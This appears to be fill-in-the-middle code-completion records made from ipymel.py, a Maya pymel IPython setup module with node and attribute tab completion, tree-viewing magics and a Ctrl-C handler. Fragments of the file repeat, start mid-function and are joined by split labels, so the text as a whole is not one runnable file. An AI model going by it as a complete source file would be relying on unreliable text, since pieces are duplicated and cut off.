ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver >= [1, 0]:
import IPython.terminal.ipapp
app = IPython.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
elif ipy_ver >= [0, 11]:
import IPython.frontend.terminal.ipapp
app = IPython.frontend.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
else:
import IPython.Shell
shell = IPython.Shell.start()
setup(shell)
shell.mainloop()
if __name__ == '__main__':
main() | random_line_split |
|
ipymel.py | """
pymel ipython configuration
Current Features
----------------
tab completion of depend nodes, dag nodes, and attributes
automatic import of pymel
Future Features
---------------
- tab completion of PyNode attributes
- color coding of tab complete options
- to differentiate between methods and attributes
- dag nodes vs depend nodes
- shortNames vs longNames
- magic commands
- bookmarking of maya's recent project and files
To Use
------
place in your PYTHONPATH
add the following line to the 'main' function of $HOME/.ipython/ipy_user_conf.py::
import ipymel
Author: Chad Dombrova
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from past.builtins import basestring
from builtins import object
from optparse import OptionParser
try:
import maya
except ImportError as e:
print("ipymel can only be setup if the maya package can be imported")
raise e
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver < [0, 11]:
def get_ipython():
import IPython.ipapi
return IPython.ipapi.get()
IPython.ipapi.IPApi.define_magic = IPython.ipapi.IPApi.expose_magic
import IPython.ColorANSI as coloransi
from IPython.genutils import page
from IPython.ipapi import UsageError
import IPython.Extensions.ipy_completers
def get_colors(obj):
return color_table[obj.rc.colors].colors
else: # >= [0, 11]
import IPython.utils.coloransi as coloransi
from IPython.core.page import page
from IPython.core.error import UsageError
def get_colors(obj):
return color_table[ip.colors].colors
if ipy_ver >= [0, 13]:
def define_magic(interpreter, function):
def get_ipython():
return interpreter
from IPython.core.magic import register_line_magic
register_line_magic(function)
else:
def define_magic(interpreter, function):
interpreter.define_magic(function.__name__, function)
try:
from IPython.core.error import TryNext
except ImportError:
from IPython.ipapi import TryNext
Colors = coloransi.TermColors
ColorScheme = coloransi.ColorScheme
ColorSchemeTable = coloransi.ColorSchemeTable
ip = None
try:
import readline
except ImportError:
import pyreadline as readline
delim = readline.get_completer_delims()
delim = delim.replace('|', '') # remove pipes
delim = delim.replace(':', '') # remove colon
# delim = delim.replace("'", '') # remove quotes
# delim = delim.replace('"', '') # remove quotes
readline.set_completer_delims(delim)
import inspect
import re
import glob
import os
import shlex
import sys
# don't import pymel here, as this will trigger loading of maya/pymel
# immediately, and things in the userSetup.py won't get properly entered into
# the ipython shell's namespace... we need the startup of maya to happen
# from "within" ipython, ie, when we do:
# ip.ex("from pymel.core import *")
# from pymel import core
# we also can't even use maya.cmds, because it doesn't work in anything other
# than the main thread... and most of the tab-completion stuff runs in a
# subthread... so api it is!
# Use api2 because it's faster...
import maya.api.OpenMaya as om
_scheme_default = 'Linux'
# Build a few color schemes
NoColor = ColorScheme(
'NoColor', {
'instance': Colors.NoColor,
'collapsed': Colors.NoColor,
'tree': Colors.NoColor,
'transform': Colors.NoColor,
'shape': Colors.NoColor,
'nonunique': Colors.NoColor,
'nonunique_transform': Colors.NoColor,
'normal': Colors.NoColor # color off (usu. Colors.Normal)
})
LinuxColors = ColorScheme(
'Linux', {
'instance': Colors.LightCyan,
'collapsed': Colors.Yellow,
'tree': Colors.Green,
'transform': Colors.White,
'shape': Colors.LightGray,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
LightBGColors = ColorScheme(
'LightBG', {
'instance': Colors.Cyan,
'collapsed': Colors.LightGreen,
'tree': Colors.Blue,
'transform': Colors.DarkGray,
'shape': Colors.Black,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
# Build table of color schemes (needed by the dag_parser)
color_table = ColorSchemeTable([NoColor, LinuxColors, LightBGColors],
_scheme_default)
color_table['Neutral'] = LightBGColors
def splitDag(obj):
buf = obj.split('|')
tail = buf[-1]
path = '|'.join(buf[:-1])
return path, tail
def expand(obj):
"""
allows for completion of objects that reside within a namespace. for example,
``tra*`` will match ``trak:camera`` and ``tram``
for now, we will hardwire the search to a depth of three recursive namespaces.
TODO:
add some code to determine how deep we should go
"""
return (obj + '*', obj + '*:*', obj + '*:*:*')
def api_ls(args, dagOnly, long=False):
'''Because the tab completer runs in a subthread, and cmds.ls doesn't
seem to work very well from a subthread, use maya.api.OpenMaya'''
sel = om.MSelectionList()
if isinstance(args, basestring):
args = [args]
for arg in args:
# if it doesn't exist, MSelectionList.add will raise an error -
# ignore that
try:
sel.add(arg)
except Exception:
pass
if not long and not dagOnly:
return list(sel.getSelectionStrings())
# long is only used when getting nodes, not plugs, so ignore that case
# for now...
results = []
mfnDep = om.MFnDependencyNode()
for i in range(sel.length()):
try:
dagPath = sel.getDagPath(i)
except TypeError:
if dagOnly:
continue
mobj = sel.getDependNode(i)
mfnDep.setObject(mobj)
results.append(mfnDep.name())
else:
if long:
results.append(dagPath.fullPathName())
else:
results.append(dagPath.partialPathName())
return results
def api_children(path):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
# we have a full node, get it's children
else:
matches = get_children(nametext, dagOnly)
if not matches:
|
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]' % nn)
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def sigint_plugin_loaded_callback(*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler()
sigint_plugin_loaded_callback_id = None
DAG_MAGIC_COMPLETER_RE = re.compile(r"(?P<preamble>%dag\s+)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)*)(?P<current_part>[a-zA-Z0-9:_]*))$")
DAG_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)+)(?P<current_part>[a-zA-Z0-9:_]*))$")
NAME_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_.]*(\.|\|))*)(?P<current_part>[a-zA-Z0-9:_]*))$")
ATTR_RE = re.compile(r"""(?P<prefix>[a-zA-Z_0-9|:.]+)\.(?P<partial_attr>\w*)$""")
def setup(shell):
global ip
if hasattr(shell, 'get_ipython'):
ip = shell.get_ipython()
else:
ip = get_ipython()
ip.set_hook('complete_command', pymel_python_completer, re_key="(?!{})".format(NAME_COMPLETER_RE.pattern))
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_MAGIC_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_name_completer, re_key=NAME_COMPLETER_RE.pattern)
ip.set_hook('complete_command', open_completer, str_key="openf")
ip.ex("from pymel.core import *")
# stuff in __main__ is not necessarily in ipython's 'main' namespace... so
# if the user has something in userSetup.py that he wants put in the
# "interactive" namespace, it won't be - unless we do this:
ip.ex('from __main__ import *')
# if you don't want pymel imported into the main namespace, you can replace the above with something like:
#ip.ex("import pymel as pm")
define_magic(ip, openf)
define_magic(ip, dag)
define_magic(ip, dghist)
# add projects
ip.ex("""
import os.path
for _mayaproj in optionVar.get('RecentProjectsList', []):
_mayaproj = os.path.join( _mayaproj, 'scenes' )
if _mayaproj not in _dh:
_dh.append(_mayaproj)""")
# add files
ip.ex("""
import os.path
_sh=[]
for _mayaproj in optionVar.get('RecentFilesList', []):
if _mayaproj not in _sh:
_sh.append(_mayaproj)""")
# setup a handler for ctrl-c / SIGINT / KeyboardInterrupt, so maya / ipymel
# doesn't quit
install_sigint_handler(force=True)
# unfortunately, when Mental Ray loads, it installs a new SIGINT handler
# which restores the old "bad" behavior... need to install a plugin callback
# to restore ours...
global sigint_plugin_loaded_callback_id
import pymel.core as pm
if sigint_plugin_loaded_callback_id is None:
sigint_plugin_loaded_callback_id = pm.api.MSceneMessage.addStringArrayCallback(
pm.api.MSceneMessage.kAfterPluginLoad,
sigint_plugin_loaded_callback)
def main():
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver >= [1, 0]:
import IPython.terminal.ipapp
app = IPython.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
elif ipy_ver >= [0, 11]:
import IPython.frontend.terminal.ipapp
app = IPython.frontend.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
else:
import IPython.Shell
shell = IPython.Shell.start()
setup(shell)
shell.mainloop()
if __name__ == '__main__':
main()
| raise TryNext | conditional_block |
ipymel.py | """
pymel ipython configuration
Current Features
----------------
tab completion of depend nodes, dag nodes, and attributes
automatic import of pymel
Future Features
---------------
- tab completion of PyNode attributes
- color coding of tab complete options
- to differentiate between methods and attributes
- dag nodes vs depend nodes
- shortNames vs longNames
- magic commands
- bookmarking of maya's recent project and files
To Use
------
place in your PYTHONPATH
add the following line to the 'main' function of $HOME/.ipython/ipy_user_conf.py::
import ipymel
Author: Chad Dombrova
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from past.builtins import basestring
from builtins import object
from optparse import OptionParser
try:
import maya
except ImportError as e:
print("ipymel can only be setup if the maya package can be imported")
raise e
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver < [0, 11]:
def get_ipython():
import IPython.ipapi
return IPython.ipapi.get()
IPython.ipapi.IPApi.define_magic = IPython.ipapi.IPApi.expose_magic
import IPython.ColorANSI as coloransi
from IPython.genutils import page
from IPython.ipapi import UsageError
import IPython.Extensions.ipy_completers
def get_colors(obj):
return color_table[obj.rc.colors].colors
else: # >= [0, 11]
import IPython.utils.coloransi as coloransi
from IPython.core.page import page
from IPython.core.error import UsageError
def get_colors(obj):
return color_table[ip.colors].colors
if ipy_ver >= [0, 13]:
def define_magic(interpreter, function):
def get_ipython():
return interpreter
from IPython.core.magic import register_line_magic
register_line_magic(function)
else:
def define_magic(interpreter, function):
interpreter.define_magic(function.__name__, function)
try:
from IPython.core.error import TryNext
except ImportError:
from IPython.ipapi import TryNext
Colors = coloransi.TermColors
ColorScheme = coloransi.ColorScheme
ColorSchemeTable = coloransi.ColorSchemeTable
ip = None
try:
import readline
except ImportError:
import pyreadline as readline
delim = readline.get_completer_delims()
delim = delim.replace('|', '') # remove pipes
delim = delim.replace(':', '') # remove colon
# delim = delim.replace("'", '') # remove quotes
# delim = delim.replace('"', '') # remove quotes
readline.set_completer_delims(delim)
import inspect
import re
import glob
import os
import shlex
import sys
# don't import pymel here, as this will trigger loading of maya/pymel
# immediately, and things in the userSetup.py won't get properly entered into
# the ipython shell's namespace... we need the startup of maya to happen
# from "within" ipython, ie, when we do:
# ip.ex("from pymel.core import *")
# from pymel import core
# we also can't even use maya.cmds, because it doesn't work in anything other
# than the main thread... and most of the tab-completion stuff runs in a
# subthread... so api it is!
# Use api2 because it's faster...
import maya.api.OpenMaya as om
_scheme_default = 'Linux'
# Build a few color schemes
NoColor = ColorScheme(
'NoColor', {
'instance': Colors.NoColor,
'collapsed': Colors.NoColor,
'tree': Colors.NoColor,
'transform': Colors.NoColor,
'shape': Colors.NoColor,
'nonunique': Colors.NoColor,
'nonunique_transform': Colors.NoColor,
'normal': Colors.NoColor # color off (usu. Colors.Normal)
})
LinuxColors = ColorScheme(
'Linux', {
'instance': Colors.LightCyan,
'collapsed': Colors.Yellow,
'tree': Colors.Green,
'transform': Colors.White,
'shape': Colors.LightGray,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
LightBGColors = ColorScheme(
'LightBG', {
'instance': Colors.Cyan,
'collapsed': Colors.LightGreen,
'tree': Colors.Blue,
'transform': Colors.DarkGray,
'shape': Colors.Black,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
# Build table of color schemes (needed by the dag_parser)
color_table = ColorSchemeTable([NoColor, LinuxColors, LightBGColors],
_scheme_default)
color_table['Neutral'] = LightBGColors
def splitDag(obj):
buf = obj.split('|')
tail = buf[-1]
path = '|'.join(buf[:-1])
return path, tail
def expand(obj):
"""
allows for completion of objects that reside within a namespace. for example,
``tra*`` will match ``trak:camera`` and ``tram``
for now, we will hardwire the search to a depth of three recursive namespaces.
TODO:
add some code to determine how deep we should go
"""
return (obj + '*', obj + '*:*', obj + '*:*:*')
def api_ls(args, dagOnly, long=False):
'''Because the tab completer runs in a subthread, and cmds.ls doesn't
seem to work very well from a subthread, use maya.api.OpenMaya'''
sel = om.MSelectionList()
if isinstance(args, basestring):
args = [args]
for arg in args:
# if it doesn't exist, MSelectionList.add will raise an error -
# ignore that
try:
sel.add(arg)
except Exception:
pass
if not long and not dagOnly:
return list(sel.getSelectionStrings())
# long is only used when getting nodes, not plugs, so ignore that case
# for now...
results = []
mfnDep = om.MFnDependencyNode()
for i in range(sel.length()):
try:
dagPath = sel.getDagPath(i)
except TypeError:
if dagOnly:
continue
mobj = sel.getDependNode(i)
mfnDep.setObject(mobj)
results.append(mfnDep.name())
else:
if long:
results.append(dagPath.fullPathName())
else:
results.append(dagPath.partialPathName())
return results
def api_children(path):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
# we have a full node, get it's children
else:
matches = get_children(nametext, dagOnly)
if not matches:
raise TryNext
# if we have only one match, get the children as well
